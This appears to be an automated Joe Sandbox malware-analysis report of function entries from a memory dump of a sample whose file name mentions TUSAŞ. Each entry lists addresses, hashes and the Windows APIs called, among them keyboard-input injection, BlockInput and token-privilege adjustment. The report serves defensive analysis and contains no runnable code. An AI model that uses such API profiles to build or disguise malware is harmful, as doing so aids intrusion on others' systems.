Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 062ae0f87eb7894573e02fd47167b89fe46f3bf88737f966f782964bbaf06121
Instruction ID: 71f49603fe4815ace901e9e753a1e53d8e2d86385df3dd057c288715f87eac2e
Opcode Fuzzy Hash: 062ae0f87eb7894573e02fd47167b89fe46f3bf88737f966f782964bbaf06121
Instruction Fuzzy Hash: 1BD0C9B480111DEACF98CB90EC88DDAB37CBB14345F114152F146A2100DB3095488F10

Function 001ACAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 0030966581f8dc7f1fa3f181a7f9f927b413d55fa5b53604e54983191fd92ae3
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 94021C75E002199FDF14CFA9C8806ADFBF1EF59324F25816AD819E7384D731AA418BD4

Function 0018CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 001D0C40
p#%, xrefs: 0018CF7F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#%
API String ID: 0-450323306
Opcode ID: f6065fd80c6ce42ec9d998f988a281a2455549b8635e565190eefa155c278856
Instruction ID: cad0318311ff89eb44563abd519b3e111d64d106518e6fa24fb6dfdb478edf9f
Opcode Fuzzy Hash: f6065fd80c6ce42ec9d998f988a281a2455549b8635e565190eefa155c278856
Instruction Fuzzy Hash: 02329B70900218DFDF19EF94D881BEDB7B5BF19304F24805AE906AB292D775AE45CFA0

Function 001F68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001F6918
FindClose.KERNEL32(00000000), ref: 001F6961

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0ada6ae98ac6269af566fa9bc1174091678b8dafbc9d618a6e932eddd5c208d8
Instruction ID: 53fafce5139dfa2928a898c32312c75ff50d16fe194e9befd2e1ae1960ae973d
Opcode Fuzzy Hash: 0ada6ae98ac6269af566fa9bc1174091678b8dafbc9d618a6e932eddd5c208d8
Instruction Fuzzy Hash: B811D0356042009FD710DF29D488A26BBE0FF84328F14C699E9698F2A2CB70EC05CB90

Function 001F37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00204891,?,?,00000035,?), ref: 001F37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00204891,?,?,00000035,?), ref: 001F37F4

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 67036c74d1e58efe3bd5732d6a7cbc401b28902300116d1ecaa2166655a97ff5
Instruction ID: 5eef793919db23e587a2ce39f8294c6d2154cb7ac5d99c163cda3e6c6731c26a
Opcode Fuzzy Hash: 67036c74d1e58efe3bd5732d6a7cbc401b28902300116d1ecaa2166655a97ff5
Instruction Fuzzy Hash: D7F0E5B46042282AE72027669C4DFEB3AAEEFC5761F000275F619D2281DBA09944C7B0

Function 001EB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001EB25D
keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 001EB270

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 58d61fa07b1bc6db8b2d83ae6fcce1df39ca792afb787d91e0250ad8c846e6ad
Instruction ID: 09dc93b96ca6faf5cd885aff059ff0c2b3658c7a2fc12771bd0fa0b2ff5c5fe6
Opcode Fuzzy Hash: 58d61fa07b1bc6db8b2d83ae6fcce1df39ca792afb787d91e0250ad8c846e6ad
Instruction Fuzzy Hash: C5F01D7584428EABDB059FA1D805BEE7BB4FF04305F108009F955A5191C7799611DF94

Function 001E10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001E11FC), ref: 001E10D4
CloseHandle.KERNEL32(?,?,001E11FC), ref: 001E10E9

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 38b4ffadf544fd292ca47f2c949e0833bce8ddb43bef7900cf42d5d65832e8c1
Instruction ID: 202b5073e7aaea2fef6a4e17491ab03c68cf79e886f80ea7fd7aad95f4e5d6b3
Opcode Fuzzy Hash: 38b4ffadf544fd292ca47f2c949e0833bce8ddb43bef7900cf42d5d65832e8c1
Instruction Fuzzy Hash: 9FE0BF76058610BFEB252B51FC09EB777E9EB14310B24C82DF5A5804B1DB626C91DB50

Function 001B676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001B6766,?,?,00000008,?,?,001BFEFE,00000000), ref: 001B6998

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: a2d877519da0c6ad57284ff662c52c7f56927c83460b57af5dd46246a8e22a91
Instruction ID: 29a13a4c2cc1e14390cf0d1f0cd8b8080d484fea77cdd4fc4bad312b67a9bb28
Opcode Fuzzy Hash: a2d877519da0c6ad57284ff662c52c7f56927c83460b57af5dd46246a8e22a91
Instruction Fuzzy Hash: 52B14D31510608DFDB19CF28C486BA57BE0FF55364F298658E899CF2A2C739E991CB40

Function 0019B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 001D851F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9b9424c4dd54e37f34b11addd8dcc8dd5da8b5ef3beb26e0fba80351e9f14b69
Instruction ID: 64fa5b7e7d70d4297d13ffc6baa0cb7d1d2bcc6e946fa23d7b2b211ea82d1ac5
Opcode Fuzzy Hash: 9b9424c4dd54e37f34b11addd8dcc8dd5da8b5ef3beb26e0fba80351e9f14b69
Instruction Fuzzy Hash: 36127D71E042299BCF24CF58D9816EEB7F5FF48710F1581AAE849EB251DB309A81DF90

Function 001FEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 001FEABD

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 973dd9e1507785859a8f00f24669646e839c813c3311ecbe7da683ea8ded7491
Instruction ID: 10d61b34d374422096a06fc3fd9b0bd401c0f35ba21563d5463d5d7fb5e5fb48
Opcode Fuzzy Hash: 973dd9e1507785859a8f00f24669646e839c813c3311ecbe7da683ea8ded7491
Instruction Fuzzy Hash: CFE04F752002049FD710EF59E844E9AFBEDBFA8760F148416FD49C7361DB70E9408BA0

Function 001A09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001A03EE), ref: 001A09DA

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5b0a16c565d55e5864166b456ccbf34a521d275694f9cfb0012d991cde7078ff
Instruction ID: e502ee0e992cf055e097e08056b408c04ef53269bf6ea44a02a944ecec562f1f
Opcode Fuzzy Hash: 5b0a16c565d55e5864166b456ccbf34a521d275694f9cfb0012d991cde7078ff
Instruction Fuzzy Hash:

Function 001A781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 001A798B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 1358f862a56fcbacdb3a7d3e7b5012b6a9d77cc7f9cb00b9241d1a9c0f773f15
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 4A51657E60C7056BDB3885288C5EBBF63899B13354F18051AE886D72C3CB19DF05D356

Function 001F2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&%, xrefs: 001F2053

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: 0&%
API String ID: 0-1408265185
Opcode ID: 5850d15422356935ec434eb6ba042e3fb65c7d1b07c101bffc9edde7aca31018
Instruction ID: bb27767387af403621f5ce4e385f27a8513b16204294ae98ce807be1f25cba13
Opcode Fuzzy Hash: 5850d15422356935ec434eb6ba042e3fb65c7d1b07c101bffc9edde7aca31018
Instruction Fuzzy Hash: E921B7326206158BDB28CF79D82367E73E9A764310F15862EF4A7C37D0DE39A904CB84

Function 001B6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d591bd5ba2b3ba79d9ceb1f00b005b85151f9054e63d7024487c3aaf2f068d
Instruction ID: 43865a847a92aebfe5b47eb059a5aa03539734b0b14dc528c840596c38cafa32
Opcode Fuzzy Hash: b2d591bd5ba2b3ba79d9ceb1f00b005b85151f9054e63d7024487c3aaf2f068d
Instruction Fuzzy Hash: 4F322222D29F019DD7339634DC26335A689AFF73C5F15E737E81AB5AA9EB29C4834100

Function 0019CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9915a8cc1305e7e92670afa25f5755fbff41a07bd0723ad4c0e7fce941423b
Instruction ID: 06bdd91ef785ff83b28a125afb0478a4d0094ed9c0665b25867f805ce99c26dd
Opcode Fuzzy Hash: 8b9915a8cc1305e7e92670afa25f5755fbff41a07bd0723ad4c0e7fce941423b
Instruction Fuzzy Hash: CD320332A401178BDF28CB68C4946BD7BA2EB45314F298D6BD48ACB391E730DD81DBC0

Function 00187920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12c539f8c1bf5eabbea20b2d63553a2eeec62cabdcf941d53bb9dff03b0630a0
Instruction ID: 100e5c2283a491264c5ddc23a7adc8b5062f181b777e2b7782661d901f422047
Opcode Fuzzy Hash: 12c539f8c1bf5eabbea20b2d63553a2eeec62cabdcf941d53bb9dff03b0630a0
Instruction Fuzzy Hash: B1228070A04609DFDF18DFA4D881BAEB7F6FF54300F244529E816A7291EB35EA51CB50

Function 001891C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0acabf8008adc580424e1767e94632d2b041dbf4ad130831bd077d0382d77fa
Instruction ID: 7889417426b11ef3f517e9fec82873859838f90b612951d6d54349ab3803c9eb
Opcode Fuzzy Hash: b0acabf8008adc580424e1767e94632d2b041dbf4ad130831bd077d0382d77fa
Instruction Fuzzy Hash: 0D0282B1A00209EBDF04DF64D881BAEB7F5FF64300F158169E816DB291EB31EA51CB95

Function 001A1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: a9de0b38592e351c309d09ab2bbafc9f63145b9df204594ba3fbc2f1428f7933
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: B391667B1080A35ADB2E467E857807EFFE15A933B1B1A079DD4F2CA1C5FF248958D620

Function 001A19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: f59e8cfde2b867cb84976ae663e52cdf24c214c7c68cde6879306e23b110ac98
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 12912F7A2090E35ADB2D467A857403EFFF15A933A2B1A079ED4F2CB1C5FF248564D620

Function 001A7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3db3505fa3c263367321eb7658ccfd6145d7fea63fc6b8f9ff9f83f71b7f00
Instruction ID: 575d8710cc219aabc542a85542d1eb2d309db479e6b1158a797ff3a5f915b97a
Opcode Fuzzy Hash: 7d3db3505fa3c263367321eb7658ccfd6145d7fea63fc6b8f9ff9f83f71b7f00
Instruction Fuzzy Hash: 006148BD608709AADA38AA288D95BBF2398DF53710F180919E842DB2C1DB119F428365

Function 001A1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 035ac50aa114b85376c7ff6d9588af1ce9923408151ea6b464ac3dd00aee8d0f
